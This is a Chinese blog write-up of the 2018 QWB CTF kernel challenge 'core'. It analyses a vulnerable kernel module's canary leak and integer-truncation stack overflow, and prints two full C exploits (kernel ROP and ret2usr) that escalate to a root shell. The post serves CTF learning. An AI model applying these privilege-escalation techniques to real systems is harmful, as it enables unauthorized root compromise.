linux kernel pwn -- 2018qwb_core

最新推荐文章于 2024-02-13 22:01:30 发布
最新推荐文章于 2024-02-13 22:01:30 发布
阅读量264 收藏
点赞数 2
分类专栏: CTF PWN 文章标签: linux kernel 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abel_big_xu/article/details/115095823
版权
CTF 同时被 2 个专栏收录
23 篇文章 2 订阅
订阅专栏
PWN
14 篇文章 1 订阅
订阅专栏

0x01 查看题目

1.查看start.sh启动脚本,开启了kaslr,但是没有开smep和smap,这里有个小坑-m 64M会报错内存不够,可以改成-m 1024M

qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd  ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s  \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic  \

2.解包文件系统,提取需要分析的模块

mkdir core
cp core.cpio core/
cd core
//因为这次是压缩文件所以需要先解压缩
mv core.cpio core.cpio.gz
gunzip core.cpio.gz
cpio -idmv < ./core.cpio

3.查看init文件,将/proc/kallsyms保存到了/tmp/kallsyms中符号偏移可以从该文件中读取,之后限制了kallsyms和dmesg的使用,当然调试的时候可以先用root去调试。分析模块应该是core.ko

!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0  -f

0x02 分析程序

init_module创建了/proc/core
在这里插入图片描述
ioctl中实现了3个功能,0x6677889b调用core_read,0x6677889c设置off值,0x6677889A调用core_copy_func
在这里插入图片描述
core_read,通过设置off可以泄露栈上的数据(canary和kernel base)
在这里插入图片描述
write函数利用copy_from_user向name赋值。
在这里插入图片描述
core_copy_func存在类型转换漏洞,a1是signed64类型,qmemcpy传入是会截断成unsigned16。所以当传入(0xffffffffffff0000|0x100)能从name 赋值0x100字节到v2
在这里插入图片描述

利用pwntools找到commit_creds和prepare_kernel_cred的偏移
在这里插入图片描述
小结:core.ko存在两个漏洞,
1.core_read中可以通过设置off来找到cannary和内核指针。
2.core_copy_func类型转换漏洞导致栈溢出

0x03 ROP思路

利用思路

  1. 通过/tmp/kallsyms来得到vmlinux_base
  2. 通过ioctl 0x6677889C来设置off=0x40
  3. 通过ioctl 0x6677889B 泄露cannary
  4. 通过write向name写rop链
  5. 通过ioctl 0x6677889A 利用类型转换漏洞向v2赋值name中的rop链
  6. getroot

rop链要如何构造呢?(和glibc中找rop类似)
1.commit(prepare_kernel_cred(0)),需要将prepare_kernel_cred得到的rax赋值给rdi再继续调用commit
2.swapgs retqr回到用户空间

下面就很简单了先用ropper --file vmlinux --nocolor > g1得到gadget。然后根据上面的需求去寻找需要的gadget
下面就是找到的一些gadget

size_t pop_rdi_ret = 0xffffffff81000b2f;//: pop rdi; ret;
size_t swapgs_popfq_ret = 0xffffffff81a012da;//: swapgs; popfq; ret;
size_t iretq_ret = 0xffffffff81050ac2;//: iretq; ret;
size_t push_rax_ret = 0xffffffff81041c45;//: push rax; ret;
size_t mov_rdi_rax_p_j = 0xffffffff81532471;//: mov rdi, rax; pop rbp; jmp rcx;
size_t pop_rcx_ret = 0xffffffff81021e53;//: pop rcx; ret;

rop exp

//gcc rop.c -static -masm=intel -g -o rop
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define COMMIT_CREDS_OFFSET 0x9c8e0
#define PREPARE_KERNEL_CRED_OFFSET 0x9cce0
#define CORE_READ 0x6677889B
#define SETOFF 0x6677889C
#define CORE_COPY_FUNC 0x6677889A

size_t vmlinux_base,commit_creds,prepare_kernel_cred;
size_t raw_vmlinux_base=0xffffffff81000000;
int fd;
size_t buf[0x80];
size_t rop[0x100];
size_t cannary;
void find_symbols()
{
    FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");

    if(kallsyms_fd < 0)
    {
        puts("[*]open kallsyms error!");
        exit(0);
    }
    char buf[0x30] = {0};
    while(fgets(buf, 0x30, kallsyms_fd))
    {
        if(commit_creds & prepare_kernel_cred)
            return 0;
        if(strstr(buf, "commit_creds") && !commit_creds)
        {
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            sscanf(hex, "%llx", &commit_creds);
            printf("commit_creds addr: %p\n", commit_creds);
            vmlinux_base = commit_creds - COMMIT_CREDS_OFFSET;
        }

        if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
        {
            /* puts(buf); */
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            sscanf(hex, "%llx", &prepare_kernel_cred);
            printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
            vmlinux_base = prepare_kernel_cred - PREPARE_KERNEL_CRED_OFFSET;
        }
    }
    if(!(prepare_kernel_cred & commit_creds))
    {
        puts("[*]Error!");
        exit(0);
    }
}
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}
void FDinit()
{
    fd = open("/proc/core",O_RDWR);
    if(fd<0){
        printf("open core error\n");
        exit(-1);
    }
}
void setOff(int off)
{
    ioctl(fd,SETOFF,off);
}
void core_read()
{
    ioctl(fd,CORE_READ,buf);
    for(int i=0;i<8;i++){
        printf("[*]%d:%llx\n",i,buf[i]);
    }
}
void core_copy_func()
{
    ioctl(fd,CORE_COPY_FUNC,(0xffffffffffff0000|(0x100)));
}

void getshell()
{
    if(!getuid()){
        system("/bin/sh");
    }else{
        printf("not root\n");
    }
}
size_t pop_rdi_ret = 0xffffffff81000b2f;//: pop rdi; ret;
size_t swapgs_popfq_ret = 0xffffffff81a012da;//: swapgs; popfq; ret;
size_t iretq_ret = 0xffffffff81050ac2;//: iretq; ret;
size_t push_rax_ret = 0xffffffff81041c45;//: push rax; ret;
size_t mov_rdi_rax_p_j = 0xffffffff81532471;//: mov rdi, rax; pop rbp; jmp rcx;
size_t pop_rcx_ret = 0xffffffff81021e53;//: pop rcx; ret;
int main()
{
    find_symbols();//读取/tmp/kallsyms
    printf("vmlinux:%llx\n",vmlinux_base);
    save_status();//保存寄存器
    FDinit();
    setOff(0x40);
    core_read();
    cannary = buf[0];
    size_t offset = vmlinux_base - raw_vmlinux_base;
    printf("[*]vmlinux_base:%llx\n",vmlinux_base);
    printf("[*]cannary:%llx\n",cannary);
    int i;
    for(i=0;i<10;i++)
        rop[i] = cannary;
    rop[i++]=pop_rdi_ret+offset;
    rop[i++]=0;
    rop[i++]=prepare_kernel_cred;
    rop[i++]=pop_rcx_ret+offset;
    rop[i++]=commit_creds;
    rop[i++]=mov_rdi_rax_p_j+offset;
    rop[i++]=0;
    rop[i++]=swapgs_popfq_ret+offset;
    rop[i++]=0;
    rop[i++]=iretq_ret+offset;
    rop[i++]=(size_t)&getshell;
    rop[i++]=user_cs;
    rop[i++]=user_rflags;
    rop[i++]=user_sp;
    rop[i++]=user_ss;
    //commit_creds(prepare_kernel_cred(0))
    //swapgs
    //iret;
    write(fd,rop,0x100);
    printf("[*]write rop\n");
    core_copy_func();
}

0x04 ret2usr思路

因为没有开smep(内核不能执行用户空间代码)和smap(内核不能直接访问用户空间数据),所以栈溢出可以直接覆盖返回到用户空间执行commit_creds(prepare_kernel_cred(0))。
exp

/gcc ret2usr.c -static -masm=intel -g -o ret2usr
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define COMMIT_CREDS_OFFSET 0x9c8e0
#define PREPARE_KERNEL_CRED_OFFSET 0x9cce0
#define CORE_READ 0x6677889B
#define SETOFF 0x6677889C
#define CORE_COPY_FUNC 0x6677889A

size_t vmlinux_base,commit_creds,prepare_kernel_cred;
size_t raw_vmlinux_base=0xffffffff81000000;
int fd;
size_t buf[0x80];
size_t rop[0x100];
size_t cannary;
void find_symbols()
{
    FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");

    if(kallsyms_fd < 0)
    {
        puts("[*]open kallsyms error!");
        exit(0);
    }
    char buf[0x30] = {0};
    while(fgets(buf, 0x30, kallsyms_fd))
    {
        if(commit_creds & prepare_kernel_cred)
            return 0;
        if(strstr(buf, "commit_creds") && !commit_creds)
        {
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            sscanf(hex, "%llx", &commit_creds);
            printf("commit_creds addr: %p\n", commit_creds);
            vmlinux_base = commit_creds - COMMIT_CREDS_OFFSET;
        }

        if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
        {
            /* puts(buf); */
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            sscanf(hex, "%llx", &prepare_kernel_cred);
            printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
            vmlinux_base = prepare_kernel_cred - PREPARE_KERNEL_CRED_OFFSET;
        }
    }
    if(!(prepare_kernel_cred & commit_creds))
    {
        puts("[*]Error!");
        exit(0);
    }
}
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}
void FDinit()
{
    fd = open("/proc/core",O_RDWR);
    if(fd<0){
        printf("open core error\n");
        exit(-1);
    }
}
void setOff(int off)
{
    ioctl(fd,SETOFF,off);
}
void core_read()
{
    ioctl(fd,CORE_READ,buf);
    for(int i=0;i<8;i++){
        printf("[*]%d:%llx\n",i,buf[i]);
    }
}
void core_copy_func()
{
    ioctl(fd,CORE_COPY_FUNC,(0xffffffffffff0000|(0x100)));
}

void getshell()
{
    if(!getuid()){
        system("/bin/sh");
    }else{
        printf("not root\n");
    }
}
//函数指针的办法来执行commit_creds(prepare_kernel_cred(0))
void get_root()
{
    char* (*pkc)(int) = prepare_kernel_cred;
    void (*cc)(char*) = commit_creds;
    (*cc)((*pkc)(0));
}
size_t pop_rdi_ret = 0xffffffff81000b2f;//: pop rdi; ret;
size_t swapgs_popfq_ret = 0xffffffff81a012da;//: swapgs; popfq; ret;
size_t iretq_ret = 0xffffffff81050ac2;//: iretq; ret;
size_t push_rax_ret = 0xffffffff81041c45;//: push rax; ret;
size_t mov_rdi_rax_p_j = 0xffffffff81532471;//: mov rdi, rax; pop rbp; jmp rcx;
size_t pop_rcx_ret = 0xffffffff81021e53;//: pop rcx; ret;
int main()
{
    find_symbols();//读取/tmp/kallsyms
    printf("vmlinux:%llx\n",vmlinux_base);
    save_status();//保存寄存器
    FDinit();
    setOff(0x40);
    core_read();
    cannary = buf[0];
    size_t offset = vmlinux_base - raw_vmlinux_base;
    printf("[*]vmlinux_base:%llx\n",vmlinux_base);
    printf("[*]cannary:%llx\n",cannary);
    int i;
    for(i=0;i<10;i++)
        rop[i] = cannary;
    rop[i++]=&get_root;
    rop[i++]=swapgs_popfq_ret+offset;
    rop[i++]=0;
    rop[i++]=iretq_ret+offset;
    rop[i++]=(size_t)&getshell;
    rop[i++]=user_cs;
    rop[i++]=user_rflags;
    rop[i++]=user_sp;
    rop[i++]=user_ss;
    //commit_creds(prepare_kernel_cred(0))
    //swapgs
    //iret;
    write(fd,rop,0x100);
    printf("[*]write rop\n");
    core_copy_func();
}

0x05 总结

内核rop链构造其实和普通用户空间中没太大区别,最大区别是最后要回到用户空间来getshell。
当不存在smep和smap时,rop链到用户空间写好的函数来提升权限会比单纯使用rop更简单一些。

一个小坑:extract-vmlinux提取这个题目的vmlinux时,vmlinux没有符号表而且gadget偏移也不太正确。。。不知道具体原因是什么。

努力学习的大康
关注
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Kernel rop attack 2018QWBcore复现
qq_39948058的博客
08-28 331
前言:最近刚入手内核题,所以这里跟着ctfwiki进行学习下,大佬勿喷。。。 第一步很经典。。。如果题目没有给 vmlinux,可以通过 extract-vmlinux 提取。 看到start.sh发现开启了kalsr随机化,需要进行泄露计算基地址,这里跟用户态pwn题很相似 看下init: #!/bin/sh mount -t proc proc /proc mount -t sysfs sysfs /sys mount -t devtmpfs none /dev /sbin/mdev -s m
linux_kernal_pwn 2018 强网杯 - core
yongbaoii的博客
09-01 318
四个文件,vmlinux不用提取了。 开了kaslr。 我们说内核的保护分四种,隔离、访问控制、异常检测、随机化。 随机化有两种,一个是kaslr,一个是fgkaslr。 在开启了 KASLR 的内核中,内核的代码段基地址等地址会整体偏移。 然后解压文件系统,看看init文件相关配置。 mkdir core cp core.cpio ./core cd core mv ./core.cpio core.cpio.gz #因为cpio是经过gzip压缩过的,必须更改名字,gunzip才认识 gu.
【栈溢出】QWB2018-core
qq_61670993的博客
09-23 172
QWB2018-core,简单栈溢出
qwb2018_core kernel_rop
令则
02-14 525
qwb 2018 core 文章目录qwb 2018 core环境搭建基础修改init脚本调试漏洞整数截断-栈溢出数据泄漏利用 年轻人的第一个内核题目。 环境搭建 基础 解包: # /bin/sh mv core.cpio core/core.cpio.gz cd core gunzip core.cpio.gz cpio -idm < core.cpio rm core.cpio 重打包: # /bin/sh find . -print0 \ | cpio --null -ov --format
kernel pwn】(贰)kernel ROP
weixin_43960998的博客
03-19 411
继续学习 kernel pwn 相关知识,同时记录一些方法。 本文以 QWB2018-core 为例 1.题前准备 解压等一套流程。先看一下 start.sh (修改后): qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -netdev user,id=t0, -
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
kernel-pwn-challenge:构建可利用Linux内核质询iso的源代码-linux kernel source code
03-25
ZX2C4内核Pwn挑战 该项目构建了一个包含完整Linux内核和用户区的可引导iso。 内核具有一个安全漏洞,该漏洞使没有特权的用户可以获得root用户访问权限。 指示 输入make来构建一个iso。 在VM中引导iso。 阅读说明书...
强网杯2018_core
z1r0的博客
03-21 856
强网杯2018_core 具体可以看z1r0’s blog 题目拿到手就是一个tar包。解压 ➜ 2018强网杯-core tar -xvf core_give.tar give_to_player/ give_to_player/bzImage give_to_player/core.cpio give_to_player/start.sh give_to_player/vmlinux ➜ 2018强网杯-core ls core_give.tar give_to_player ➜ 2018强网
[BUUCTF-pwn] qwb2018_opm
weixin_52640415的博客
01-17 2081
我讨厌爆破 只有add没有free,但是add中用了gets,很明显是字符串溢出。但是这个溢出不大好利用,因为后边带个固定的\0结尾。 这样就需要堆块建在一个特殊位置0xXXXXX00XX这时候可以通过溢出控制最后一字节而不影响前边数据。由于堆块都是以000结尾,所以需要爆破半个字节。 思路: 先建几个块使一个块建在00XX的位置(建两个0x70后第3个块正好建在0030+0060,正常是建到?0XX的位置,前边那个0是爆破得到的) 再建块时先溢出到v6,将其指向前一个块的数据块(0060)这时会
21 09 05学习总结(qwb_2018_core kernel rop)
eeeeeight的博客
09-05 963
21.09.05学习总结(qwb_2018_core kernel rop) Column: September 1, 2021 Tags: kernel study, learning experience 大概是好久之后更新的一篇blog了, 之前都在忙忙碌碌的打比赛呢, 痴痴的看着短视频, 莫名其妙就会让时间流走呢(笑, 最近不会再这样了) qwb_2018_core, 唔, kernel还不是学的很好呢, 先注释一遍吧, 加强理解: #include <string.h> #includ
kernel-pwn学习(3)--ret2user&&kernel ROP&&QWB2018-core
azraelxuemo的博客
04-21 544
文章目录题目分析附件结构分析start.sh分析文件结构init分析驱动分析保护ioctl攻击泄露kernel base找到需要用的函数的偏移开始利用驱动漏洞泄露canaryROP返回到用户态触发栈溢出final exp 这个题目其实这两种做法区别不大,就是提权时候ROP会复杂很多,其实对应于我们用户态的时候ROP去完成ret2text的工作,道理差不多,我就主要分析一下ret2user 题目分析 附件 附件 结构分析 这是附件里面的内容,下面4个就是exp和exp源码,上面两个是驱动分析,主要内容就是ta
QWB-2018-core | 栈溢出
最新发布
blind cat
02-13 474
core_write:将用户态的内容写入内核态全局变量name中。
linux之vmlinux、vmlinuz、System.map和/proc/kallsyms简介
热门推荐
小立仔
05-31 1万+
vmlinux、vmlinuz、System.map和/proc/kallsyms简介
linux内核栈溢出,[原创]Linux Kernel Pwn 学习笔记(栈溢出)
weixin_39969953的博客
05-01 473
0x01 背景栈溢出是最基本的一个漏洞,学习 pwn 从栈溢出开始学习是比较简单的入门方式。之前也研究过 linux 内核,但因为种种原因不得不放弃。现在跟着安卓版主学习了几天linux内核漏洞,收获了不少知识,开始自己梳理和分享自己的笔记,特此感谢版主老师的教导0x02 内核基本知识Canary: 是防止栈溢出的保护,一般在 ebp-0x8 的位置,学习 linux pwn 的基本知识,不细讲K...
linux kernel pwn系列(一)
weixin_41918450的博客
09-26 2820
kernel pwn题目不准备以总结的方式来写,准备每一道题做一个专门的分析。网上有不少exp,准备在他人的exp的基础上进行复现(因为能力不够所以在比赛时候做不出来,只能通过事后复现)计划写 强网杯core 和 solid_core,两道改编了csaw 2010kernel pwn的题目以及ciscn babydriver。总共三道题,入门kernel pwn绰绰有余。 第一篇主要介绍linux...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值